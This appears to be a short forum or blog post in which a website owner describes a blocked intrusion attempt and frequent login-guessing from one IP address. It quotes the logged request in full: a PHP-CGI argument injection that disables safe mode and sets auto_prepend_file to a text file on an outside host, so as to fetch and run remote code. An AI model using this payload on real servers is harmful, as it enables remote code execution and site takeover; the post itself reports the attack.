Trying to access index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt on my website -- which would be called a "script attack". Googling the expression, I learnt that the hacker is "attempting to execute PHP commands which can only be run from within a terminal shell", and that it's not over dangerous. How reassuring.

This is the same IP address that is frequently auto blocked by my security system. My security is set to block "bad" behavior after a few attempts of entering a wrong password. I have had other IP addresses from the same general area in Kansas. My guess is that someone there is wasting time attempting to hack various sites.
